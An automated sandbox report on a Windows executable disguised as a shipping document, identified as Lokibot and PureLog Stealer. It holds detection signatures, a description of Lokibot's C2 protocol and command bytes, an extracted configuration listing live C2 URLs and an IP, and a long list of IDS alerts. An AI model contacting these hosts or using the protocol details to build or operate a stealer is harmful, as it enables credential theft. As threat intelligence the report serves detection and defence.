Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Overview

General Information

Sample name:Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Analysis ID:1431478
MD5:34730f3da822589c3b36ec7197ede429
SHA1:666691e4d03bb9d885184e80d5ec5639ef56a886
SHA256:deb91032be610ab0761ed5e1076877458b9adbbbf79ae250672fc1c2f5fc8d0a
Tags:exeLoki
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=ee"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              Click to see the 32 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                        Click to see the 41 entries
                        No Sigma rule has matched
                        Timestamp:04/25/24-09:42:03.512691
                        SID:2024318
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:19.955290
                        SID:2024313
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:16.290446
                        SID:2021641
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:07.780738
                        SID:2024313
                        Source Port:49804
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:19.955290
                        SID:2024318
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:03.512691
                        SID:2024313
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:22.887850
                        SID:2021641
                        Source Port:49816
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:02.263836
                        SID:2024318
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:23.788777
                        SID:2024313
                        Source Port:49770
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:55.953898
                        SID:2024318
                        Source Port:49795
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:42.568421
                        SID:2024318
                        Source Port:49829
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:46.244048
                        SID:2024313
                        Source Port:49832
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:52.171897
                        SID:2021641
                        Source Port:49792
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:23.788777
                        SID:2024318
                        Source Port:49770
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:55.953898
                        SID:2024313
                        Source Port:49795
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:26.739380
                        SID:2024313
                        Source Port:49819
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:35.562440
                        SID:2021641
                        Source Port:49826
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:49.681959
                        SID:2021641
                        Source Port:49789
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:20.366841
                        SID:2024318
                        Source Port:49814
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:52.470303
                        SID:2024313
                        Source Port:49837
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:20.366841
                        SID:2024313
                        Source Port:49814
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:46.244048
                        SID:2024318
                        Source Port:49832
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:52.470303
                        SID:2024318
                        Source Port:49837
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:33.541899
                        SID:2024313
                        Source Port:49777
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:26.739380
                        SID:2024318
                        Source Port:49819
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:33.541899
                        SID:2024318
                        Source Port:49777
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:42.568421
                        SID:2024313
                        Source Port:49829
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:11.222525
                        SID:2024313
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:39.921949
                        SID:2021641
                        Source Port:49782
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:10.231973
                        SID:2021641
                        Source Port:49806
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:11.222525
                        SID:2024318
                        Source Port:49759
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:58.700835
                        SID:2021641
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:51.138012
                        SID:2021641
                        Source Port:49836
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:04.035271
                        SID:2021641
                        Source Port:49801
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:53.510184
                        SID:2024313
                        Source Port:49793
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:47.218743
                        SID:2024318
                        Source Port:49787
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:32.856501
                        SID:2024318
                        Source Port:49824
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:29.212593
                        SID:2021641
                        Source Port:49821
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:36.805880
                        SID:2024318
                        Source Port:49827
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:42.452935
                        SID:2021641
                        Source Port:49784
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:00.985732
                        SID:2021641
                        Source Port:49799
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:53.510184
                        SID:2024318
                        Source Port:49793
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:32.856501
                        SID:2024313
                        Source Port:49824
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:43.798730
                        SID:2024313
                        Source Port:49830
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:43.798730
                        SID:2024318
                        Source Port:49830
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:57.993136
                        SID:2021641
                        Source Port:49839
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:47.218743
                        SID:2024313
                        Source Port:49787
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:22.438278
                        SID:2021641
                        Source Port:49769
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:04.713098
                        SID:2021641
                        Source Port:49754
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:26.688177
                        SID:2024318
                        Source Port:49772
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:08.607822
                        SID:2024318
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:26.688177
                        SID:2024313
                        Source Port:49772
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:08.607822
                        SID:2024313
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:48.680283
                        SID:2021641
                        Source Port:49834
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:37.405098
                        SID:2024313
                        Source Port:49780
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:58.404316
                        SID:2021641
                        Source Port:49797
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:22.887850
                        SID:2024318
                        Source Port:49816
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:30.405107
                        SID:2024313
                        Source Port:49822
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:02.263836
                        SID:2024313
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:43.818013
                        SID:2024318
                        Source Port:49785
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:07.189244
                        SID:2021641
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:13.826993
                        SID:2021641
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:37.405098
                        SID:2024318
                        Source Port:49780
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:30.405107
                        SID:2024318
                        Source Port:49822
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:36.181912
                        SID:2024313
                        Source Port:49779
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:36.181912
                        SID:2024318
                        Source Port:49779
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:36.805880
                        SID:2024313
                        Source Port:49827
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:43.818013
                        SID:2024313
                        Source Port:49785
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:19.955290
                        SID:2021641
                        Source Port:49767
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:11.469231
                        SID:2024313
                        Source Port:49807
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:22.887850
                        SID:2024313
                        Source Port:49816
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:55.953898
                        SID:2021641
                        Source Port:49795
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:35.562440
                        SID:2024318
                        Source Port:49826
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:49.906919
                        SID:2024313
                        Source Port:49835
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:27.987761
                        SID:2024318
                        Source Port:49820
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:49.906919
                        SID:2024318
                        Source Port:49835
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:31.634111
                        SID:2021641
                        Source Port:49823
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:27.987761
                        SID:2024313
                        Source Port:49820
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:24.107780
                        SID:2024318
                        Source Port:49817
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:20.366841
                        SID:2021641
                        Source Port:49814
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:12.681066
                        SID:2024318
                        Source Port:49808
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:24.107780
                        SID:2024313
                        Source Port:49817
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:17.524612
                        SID:2024318
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:52.470303
                        SID:2021641
                        Source Port:49837
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:17.524612
                        SID:2024313
                        Source Port:49765
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:48.461124
                        SID:2024313
                        Source Port:49788
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:11.469231
                        SID:2024318
                        Source Port:49807
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:54.719782
                        SID:2021641
                        Source Port:49794
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:01.045653
                        SID:2024313
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:04.035271
                        SID:2024318
                        Source Port:49801
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:25.348509
                        SID:2021641
                        Source Port:49818
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:51.138012
                        SID:2024313
                        Source Port:49836
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:41:57.336379
                        SID:2021641
                        Source Port:49735
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:04.035271
                        SID:2024313
                        Source Port:49801
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:32.329146
                        SID:2021641
                        Source Port:49776
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:48.461124
                        SID:2024318
                        Source Port:49788
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:01.045653
                        SID:2024318
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:51.138012
                        SID:2024318
                        Source Port:49836
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:36.805880
                        SID:2021641
                        Source Port:49827
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:32.856501
                        SID:2021641
                        Source Port:49824
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:38.643235
                        SID:2024318
                        Source Port:49781
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:42.452935
                        SID:2024318
                        Source Port:49784
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:57.993136
                        SID:2024313
                        Source Port:49839
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:42.452935
                        SID:2024313
                        Source Port:49784
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:43.798730
                        SID:2021641
                        Source Port:49830
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:34.955343
                        SID:2024318
                        Source Port:49778
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:34.955343
                        SID:2024313
                        Source Port:49778
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:15.058675
                        SID:2021641
                        Source Port:49763
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:18.729353
                        SID:2021641
                        Source Port:49766
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:22.438278
                        SID:2024318
                        Source Port:49769
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:22.438278
                        SID:2024313
                        Source Port:49769
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:31.102796
                        SID:2024313
                        Source Port:49775
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:08.607822
                        SID:2021641
                        Source Port:49757
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:31.102796
                        SID:2024318
                        Source Port:49775
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:38.643235
                        SID:2024313
                        Source Port:49781
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:26.688177
                        SID:2021641
                        Source Port:49772
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:08.999268
                        SID:2021641
                        Source Port:49805
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:12.681066
                        SID:2021641
                        Source Port:49808
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:58.404316
                        SID:2024318
                        Source Port:49797
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:16.392996
                        SID:2021641
                        Source Port:49811
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:35.562440
                        SID:2024313
                        Source Port:49826
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:58.404316
                        SID:2024313
                        Source Port:49797
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:07.189244
                        SID:2024313
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:15.173099
                        SID:2024318
                        Source Port:49810
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:50.920365
                        SID:2021641
                        Source Port:49791
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:13.826993
                        SID:2024313
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:47.479485
                        SID:2021641
                        Source Port:49833
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:57.993136
                        SID:2024318
                        Source Port:49839
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:07.189244
                        SID:2024318
                        Source Port:49756
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:36.181912
                        SID:2021641
                        Source Port:49779
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:15.173099
                        SID:2024313
                        Source Port:49810
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:07.780738
                        SID:2024318
                        Source Port:49804
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:13.826993
                        SID:2024318
                        Source Port:49762
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:43.818013
                        SID:2021641
                        Source Port:49785
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:09.977319
                        SID:2024318
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:12.423265
                        SID:2024313
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:09.977319
                        SID:2024313
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:12.423265
                        SID:2024318
                        Source Port:49761
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:43:11.469231
                        SID:2021641
                        Source Port:49807
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/25/24-09:42:05.989811
                        SID:2021641
                        Source Port:49755
